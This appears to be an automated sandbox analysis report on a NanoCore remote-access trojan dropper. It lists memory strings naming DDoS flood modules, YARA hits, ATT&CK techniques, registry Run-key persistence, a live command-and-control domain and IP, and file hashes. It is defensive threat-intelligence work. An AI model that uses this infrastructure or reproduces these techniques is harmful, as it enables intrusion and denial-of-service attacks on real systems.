      Source: tchnhwrvi.exe, 00000002.00000002.567185811.0000000004EA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreStressTester.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreStressTesterClientPluginHTTPFloodSlowLorisSYNFloodTCPNanoCoreStressTester.FloodUDPSendSynCommandHandlerResourcesNanoCoreStressTester.My.ResourcesMySettingsMySettingsPropertyCommandsMethodsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostIClientDataHostDataHostClientGUIDSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHost_DataHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketStartHostToAttackArrayUploadDataSiteUserAgentRefererValuesGeneratecodelengthSystem.ThreadingThreadThreadsPortToAttackTimeToAttackThreadstoUseThreadsEndedattacksAttackRunningFloodnewHostnewPortnewTimenewThreadslolStopSlowlorisStressThreadStart_floodingJob_floodingThreadSystem.NetIPEndPoint_ipEo_synClassHostIsEnabledPortSuperSynSocketsStartSuperSynStopSuperSynSystem.Net.SocketsSocketClientIPPacketsPacketSizeMaxPacketsStopFloodmPacketspSize_sockipEosuperSynSockets__1IAsyncResultOnConnectarSendFloodingstopHTTPBytesSentSYNConnectionsHTTPDataSentMethodTargetAddressTargetStatusupdateBytesnewSYNFloodHandleDDOSCommandHandleStopCommandSystem.TimersElapsedEventArgsbytesTimerElapsedsourceeHandleHTTPCommandHandleSlowlorisCommandHandl
eTCPCommandHandleUDPCommandHandleSYNCommandSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__sendStressCommandupdateStatusColumnstopStressCommandHTTPSlowlorisSYNSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeExceptionSendToServerProjectDataSetProjectErrorClearProjectErrorTimerNanoCoreIClientNameObjectCollectionget_VariablesGetValueset_Intervalset_EnabledElapsedEventHandleradd_ElapsedParamArrayAttributeRandomGuidStringIsNullOrEmptyArgumentNullExceptionArgumentOutOfRangeExce
      Source: tchnhwrvi.exe, 00000002.00000002.565592440.0000000003290000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: Yara matchFile source: 1.2.tchnhwrvi.exe.b13658.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.441fa31.20.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.417058.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.159d2c8.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.5df4629.30.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 1.2.tchnhwrvi.exe.b00000.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.417058.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.5df0000.31.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.400000.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.3290000.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.4e30ee8.19.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.3290000.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.441b408.27.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.4f8cc52.10.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.4f91a88.22.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.5df0000.31.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.441b408.27.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.4e35511.25.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 1.2.tchnhwrvi.exe.b13658.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.4f91a88.22.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.4d3ef95.14.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.400000.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.4406f6d.24.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.4e30ee8.19.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.3330000.5.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.4e2c0b2.21.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.4d32d61.13.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.4d535c2.15.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.159d2c8.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 1.2.tchnhwrvi.exe.b00000.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.4f960b1.23.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000002.00000002.567185811.0000000004E2C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.564994074.0000000001587000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.564427693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.570983718.0000000005DF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.309024218.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.567185811.0000000004404000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.567185811.0000000004C83000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.565935661.0000000003332000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.567185811.0000000004F8C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.565592440.0000000003290000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: tchnhwrvi.exe PID: 1312, type: MEMORYSTR
| Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Valid Accounts | 1 Windows Management Instrumentation | 1 Registry Run Keys / Startup Folder | 1 Access Token Manipulation | 1 Disable or Modify Tools | 21 Input Capture | 1 System Time Discovery | Remote Services | 11 Archive Collected Data | Exfiltration Over Other Network Medium | 1 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | 1 System Shutdown/Reboot |
| Default Accounts | 12 Native API | Boot or Logon Initialization Scripts | 112 Process Injection | 11 Deobfuscate/Decode Files or Information | LSASS Memory | 2 File and Directory Discovery | Remote Desktop Protocol | 21 Input Capture | Exfiltration Over Bluetooth | 1 Non-Standard Port | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
| Domain Accounts | 2 Command and Scripting Interpreter | Logon Script (Windows) | 1 Registry Run Keys / Startup Folder | 2 Obfuscated Files or Information | Security Account Manager | 26 System Information Discovery | SMB/Windows Admin Shares | 1 Clipboard Data | Automated Exfiltration | 1 Remote Access Software | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
| Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 21 Software Packing | NTDS | 141 Security Software Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 1 Non-Application Layer Protocol | SIM Card Swap | | Carrier Billing Fraud |
| Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 1 Masquerading | LSA Secrets | 2 Process Discovery | SSH | Keylogging | Data Transfer Size Limits | 21 Application Layer Protocol | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings |
| Replication Through Removable Media | Launchd | Rc.common | Rc.common | 31 Virtualization/Sandbox Evasion | Cached Domain Credentials | 31 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features |
| External Remote Services | Scheduled Task | Startup Items | Startup Items | 1 Access Token Manipulation | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact |
| Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 112 Process Injection | Proc Filesystem | 1 Remote System Discovery | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue |
| Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | 1 Hidden Files and Directories | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction |
      [Behavior graph: ID 798336; Sample: PhviZrlpkW.exe; Startdate: 03/02/2023; Architecture: WINDOWS; Score: 100]
      [Graph nodes: PhviZrlpkW.exe dropped and started tchnhwrvi.exe (C:\Users\user\AppData\Local\...\tchnhwrvi.exe, PE32); tchnhwrvi.exe dropped C:\Users\user\AppData\Roaming\...\edpm.exe (PE32) and started a second tchnhwrvi.exe; that process dropped C:\Users\user\AppData\Roaming\...\run.dat and connected to thesopranos.duckdns.org 193.31.30.138, 1365, 49691, 49693 (QUICKPACKETUS, United Kingdom); two edpm.exe processes each started WerFault.exe]

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| PhviZrlpkW.exe | 58% | ReversingLabs | Win32.Trojan.Nsisx | |
| PhviZrlpkW.exe | 53% | Virustotal | | Browse |

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe | 65% | ReversingLabs | Win32.Trojan.NSISInject | |
| C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe | 52% | Virustotal | | Browse |
| C:\Users\user\AppData\Roaming\ovawcpafrwk\edpm.exe | 65% | ReversingLabs | Win32.Trojan.NSISInject | |
| C:\Users\user\AppData\Roaming\ovawcpafrwk\edpm.exe | 52% | Virustotal | | Browse |

| Source | Detection | Scanner | Label | Link | Download |
|---|---|---|---|---|---|
| 1.2.tchnhwrvi.exe.aa0000.1.unpack | 100% | Avira | HEUR/AGEN.1215480 | | Download File |
| 2.2.tchnhwrvi.exe.400000.1.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7 | | Download File |
| 0.2.PhviZrlpkW.exe.28a8998.1.unpack | 100% | Avira | HEUR/AGEN.1215480 | | Download File |
| 2.2.tchnhwrvi.exe.5df0000.31.unpack | 100% | Avira | TR/NanoCore.fadte | | Download File |
| 2.2.tchnhwrvi.exe.441b408.27.unpack | 100% | Avira | TR/NanoCore.fadte | | Download File |
| 2.2.tchnhwrvi.exe.3330000.5.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7 | | Download File |

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| thesopranos.duckdns.org | 1% | Virustotal | | Browse |

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| thesopranos.duckdns.org | 1% | Virustotal | | Browse |
| thesopranos.duckdns.org | 100% | Avira URL Cloud | malware | |
| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| thesopranos.duckdns.org | 193.31.30.138 | true | true | | unknown |

| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| thesopranos.duckdns.org | true | 1%, Virustotal, Browse; Avira URL Cloud: malware | unknown |

| Name | Source | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|
| http://nsis.sf.net/NSIS_ErrorError | PhviZrlpkW.exe | false | | high |
| http://google.com | tchnhwrvi.exe, 00000002.00000002.567185811.0000000004E2C000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.567185811.0000000004C83000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.566066458.00000000033EE000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.567185811.0000000004F8C000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.571773496.00000000075D0000.00000004.08000000.00040000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.567185811.0000000004EA1000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | tchnhwrvi.exe, 00000002.00000002.566066458.0000000003381000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|---|
| 193.31.30.138 | thesopranos.duckdns.org | United Kingdom | | 46261 | QUICKPACKETUS | true |
            Joe Sandbox Version:36.0.0 Rainbow Opal
            Analysis ID:798336
            Start date and time:2023-02-03 23:16:11 +01:00
            Joe Sandbox Product:CloudBasic
            Overall analysis duration:0h 8m 47s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
            Number of analysed new started processes analysed:15
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • HDC enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample file name:PhviZrlpkW.exe
            Detection:MAL
            Classification:mal100.troj.evad.winEXE@9/17@17/1
            EGA Information:
            • Successful, ratio: 100%
            HDC Information:
            • Successful, ratio: 14.9% (good quality ratio 14.3%)
            • Quality average: 82.8%
            • Quality standard deviation: 26%
            HCA Information:
            • Successful, ratio: 93%
            • Number of executed functions: 79
            • Number of non-executed functions: 93
            Cookbook Comments:
            • Found application associated with file extension: .exe
            • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WerFault.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
            • Excluded IPs from analysis (whitelisted): 20.189.173.21
            • Excluded domains from analysis (whitelisted): blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, watson.telemetry.microsoft.com
            • Not all processes where analyzed, report is missing behavior information
            • Report creation exceeded maximum time and may have missing disassembly code information.
            • Report size exceeded maximum capacity and may have missing behavior information.
            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
            • Report size getting too big, too many NtDeviceIoControlFile calls found.
| Time | Type | Description |
|---|---|---|
| 23:17:10 | API Interceptor | 934x Sleep call for process: tchnhwrvi.exe modified |
| 23:17:10 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run rorscojuxn C:\Users\user\AppData\Roaming\ovawcpafrwk\edpm.exe "C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe" C:\Users\user\AppData\Loca |
| 23:17:20 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run rorscojuxn C:\Users\user\AppData\Roaming\ovawcpafrwk\edpm.exe "C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe" C:\Users\user\AppData\Loca |
| 23:17:34 | API Interceptor | 2x Sleep call for process: WerFault.exe modified |
| Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
|---|---|---|---|---|---|
| 193.31.30.138 | y5S5mjkeeT.exe | Get hash | malicious | Browse | |
| | X80UfZE3PA.exe | Get hash | malicious | Browse | |
| | Order No 2118013.doc | Get hash | malicious | Browse | |

| Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
|---|---|---|---|---|---|
| thesopranos.duckdns.org | y5S5mjkeeT.exe | Get hash | malicious | Browse | • 193.31.30.138 |
                  No context
                  No context
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):65536
                  Entropy (8bit):0.9009185981848317
                  Encrypted:false
                  SSDEEP:96:samMF1rqNb2RhED7ZRNFpXIQcQ1Uc61dcElcw30vk+HbHg/5FAZugtYsaeOEXCkN:V7cbHQDfYvtjMGIq/u7syS274ItAT
                  MD5:4C9B37DD98DEBA952CA651C113023767
                  SHA1:7887DE1B1A6A583E01E1CDC5EBBE63BB4334C4FC
                  SHA-256:DE3D30114334E4D0E04879F18702842677CC0C44096EBF3216286369E672B302
                  SHA-512:B4453A4927711578D3A60ACF796EACFED4D453A7A0F0197E34C047143EB8F3981734D5E016244DC011E365B5C635E31EF87F1F87AE1DC2FCC70B63B1757BA7D2
                  Malicious:false
                  Reputation:low
                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.1.9.9.3.6.2.4.4.3.3.7.1.5.3.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.1.9.9.3.6.2.4.5.8.3.7.2.1.9.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.b.1.2.0.6.8.1.-.b.b.9.9.-.4.3.d.c.-.8.9.4.a.-.9.5.d.0.e.5.0.e.e.b.5.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.d.7.c.e.0.f.f.-.d.7.2.5.-.4.0.8.d.-.a.4.9.6.-.c.2.2.b.c.4.6.1.e.9.d.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.e.d.p.m...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.9.a.4.-.0.0.0.1.-.0.0.1.f.-.6.0.8.9.-.a.1.4.7.1.d.3.8.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.a.3.e.9.2.b.c.b.c.a.a.a.3.b.2.b.0.b.c.8.6.1.a.c.d.9.5.9.8.9.8.0.0.0.0.f.f.f.f.!.0.0.0.0.5.6.e.0.2.2.2.b.9.d.0.2.5.c.c.d.b.4.f.f.d.6.b.e.4.4.3.e.c.1.1.d.0.4.2.d.4.9.9.3.!.e.d.p.m...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.3././.0.2././.0.1.:.
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):65536
                  Entropy (8bit):0.8944933806572445
                  Encrypted:false
                  SSDEEP:96:sFm9FFTuNb3RhED7ZRNFpXIQcQ1Uc61dcElcw30vk+HbHg5+5uHQ0DFF3V9w72/j:BnUCHQDfYvtjscPq/u7syS274ItAT
                  MD5:C237F13C24934957828430FA85EE2978
                  SHA1:FBC73199D8AAE59017DFD6F688B1C9407204B96E
                  SHA-256:6E17F3B7FDA360093B4ED4B1E3E3B151B67619323F387C78A75874D8981FACEF
                  SHA-512:195139294E3368FB93BBB011C2B12D0C0A3ED65E274CD825391D0926D604C93DB48AFDECCBE0B292D636E8DEDCBDA8799FEE3050739BDF05EC35FCCEA438D741
                  Malicious:false
                  Reputation:low
                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.1.9.9.3.6.2.5.0.4.8.7.7.7.2.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.1.9.9.3.6.2.5.1.4.2.5.3.1.8.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.1.5.c.7.2.3.3.-.6.4.e.3.-.4.8.0.2.-.b.d.8.4.-.d.a.8.5.7.1.0.6.b.2.3.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.b.9.9.a.0.4.2.-.7.a.d.6.-.4.7.b.7.-.9.6.0.1.-.f.c.e.d.f.8.5.3.7.2.9.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.e.d.p.m...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.3.f.0.-.0.0.0.1.-.0.0.1.f.-.4.7.d.c.-.8.5.4.d.1.d.3.8.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.a.3.e.9.2.b.c.b.c.a.a.a.3.b.2.b.0.b.c.8.6.1.a.c.d.9.5.9.8.9.8.0.0.0.0.f.f.f.f.!.0.0.0.0.5.6.e.0.2.2.2.b.9.d.0.2.5.c.c.d.b.4.f.f.d.6.b.e.4.4.3.e.c.1.1.d.0.4.2.d.4.9.9.3.!.e.d.p.m...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.3././.0.2././.0.1.:.
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Mini DuMP crash report, 14 streams, Fri Feb 3 22:17:24 2023, 0x1205a4 type
                  Category:dropped
                  Size (bytes):42040
                  Entropy (8bit):2.024512213894416
                  Encrypted:false
                  SSDEEP:192:ofWJo53RwgHzOsQcNq8T+VZesgYgFSwBySXPV:5nsZ7GZesgYgFSw1f
                  MD5:808457693416B37EAAACEECA1AEAEC7B
                  SHA1:4A9D9E3EC429F09E83B23E7CB8A3AB679D2C1E4E
                  SHA-256:D9533C0DBFA1E421D1151013B0A5F6A00AC33B64C59CE31BD7F8DB68858157BF
                  SHA-512:499B65D56DBCF65367E0DDA6A43EBFA416897329D16A9E0785225C692746DB92E165429425CFBEE646D8B0421AE1F8E827945C04D12068AFC1F5711E298F1FDF
                  Malicious:false
                  Reputation:low
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):8322
                  Entropy (8bit):3.686852809842928
                  Encrypted:false
                  SSDEEP:192:Rrl7r3GLNilh6H6YeuSU2KEGgmf6S8+prZ89bo3sf4hYm:RrlsNij6H6YXSU2Agmf6Smo8f4L
                  MD5:C47FB1BFB839DF2A251DAC5266C6E9A3
                  SHA1:29342D732474A52AA8D7321189C1F8B276B3762C
                  SHA-256:68BE108158A425B67822B9C7F5FBAAEA575948EA5F300BCD941BF96BA6D6829B
                  SHA-512:AE6BCA833F2FE32E6E013E20E1FE87DAD09D0BA7CB015A9698A0C05267ECD42FD1C7BBB80166E4FD5B97739AE8DCFD00123253E84435A93EF769308DDDFBB4E8
                  Malicious:false
                  Reputation:low
                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.4.6.8.<./.P.i.d.>.......
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):4622
                  Entropy (8bit):4.403333093343135
                  Encrypted:false
                  SSDEEP:48:cvIwSD8zsVJgtWI9D/TWgc8sqYjja8fm8M4JH4FZ+q8vQ3IN1zCzd:uITfva/igrsqYvJUKG41zCzd
                  MD5:7677B4D88DD3595FDD3354DAA341E362
                  SHA1:03198DAFD342EBF9A54DD17EA90692679AF72353
                  SHA-256:3A8B0111006362C92C0B6B7668CC8AC142E5AADE3D8FC021221BCBD7F6BF96E2
                  SHA-512:2E31DD349090687C5EAC647D1B6BCCA28292FE426B47113CB73EF8370BDC805958A7B33DCCAF876356EE940EC3068C4B6617E2170EAE3281D3CED301DB70BA56
                  Malicious:false
                  Reputation:low
                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1896928" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Mini DuMP crash report, 14 streams, Fri Feb 3 22:17:30 2023, 0x1205a4 type
                  Category:dropped
                  Size (bytes):40436
                  Entropy (8bit):2.056282829146087
                  Encrypted:false
                  SSDEEP:192:ilfHniryTxFOoQc6pyqb02JzQXX6e7+V6pAocCA:sqoJNqb0KzsX6y+V6phA
                  MD5:1FB3EEB01C764DABAE22F44D5E551ADE
                  SHA1:2A2685BA4440D874B09998888DD32B41517DBEDF
                  SHA-256:4342A5672DEF74E8D6A44A467C186DE7A2968AA94A37846E26641B95251E9597
                  SHA-512:D4194BE3E79E69C0A5CE5C235AD5F1ED9670D565CD07BA119418C09D10B749E81313831DCEA65D5180A19EA6DEC14D3C9B233C22A0DB15E1A968B759C06F8EAA
                  Malicious:false
                  Reputation:low
                  Process:C:\Windows\SysWOW64\WerFault.exe
